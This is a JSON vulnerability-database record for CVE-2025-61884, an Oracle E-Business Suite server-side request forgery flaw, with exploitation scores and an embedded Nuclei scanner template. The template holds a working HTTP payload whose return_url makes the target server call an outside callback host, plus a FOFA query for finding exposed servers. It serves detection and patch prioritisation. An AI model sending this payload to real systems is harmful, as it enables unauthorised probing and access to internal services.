{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2025-61884/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2025-61884/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2025-61884/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2025-61884/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2025-61884/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2025-61884"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2025-61884"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": true
    },
    "epss": {
      "epss": 0.95891,
      "kev": true,
      "percentile": 0.99872
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2025/CVE-2025-61884.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2025-61884\n\ninfo:\n  name: Oracle E-Business Suite - Server-Side Request Forgery\n  author: Kazgangap\n  severity: high\n  description: |\n    Vulnerability in the Oracle Configurator product of Oracle E-Business Suite (component: Runtime UI). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Configurator.\n  impact: |\n    Unauthenticated attackers can force the Configurator server to make requests to arbitrary URLs, potentially exposing internal services and sensitive data.\n  remediation: |\n    Apply the Oracle security patches as described in the Oracle security alert for E-Business Suite.\n  reference:\n    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-61884\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-61884\n    - https://www.oracle.com/security-alerts/alert-cve-2025-61884.html\n    - https://arcticwolf.com/resources/blog/cve-2025-61884/\n    - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-61884.md\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2025-61884\n    cwe-id: CWE-918\n    epss-score: 0.95891\n    epss-percentile: 0.99872\n    cpe: cpe:2.3:a:oracle:configurator:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    fofa-query: title=\"E-Business Suite\"\n  tags: cve,cve2025,oracle,e-business,kev,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /OA_HTML/configurator/UiServlet HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        redirectFromJsp=1&getUiType=<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n        <initialize>\n          <param name=\"init_was_saved\">{{to_lower(rand_text_alpha(6))}}</param>\n          <param name=\"return_url\">http://{{interactsh-url}}</param>\n          <param name=\"ui_def_id\">0</param>\n          <param name=\"config_effective_usage_id\">0</param>\n          <param name=\"ui_type\">Applet</param>\n        </initialize>\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"valid_configuration\",\"terminate\")'\n          - 'contains(interactsh_protocol, \"dns\")'\n        condition: and\n# digest: 4b0a00483046022100c6c45ad07ebf9144187f0345f76a7504d86f65f7ff5267d57d5831091dea9358022100f6eeca5eaae041fd8161721399267c1b8b160370fbf56fcff7005d535d467bc5:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2025-61884"
}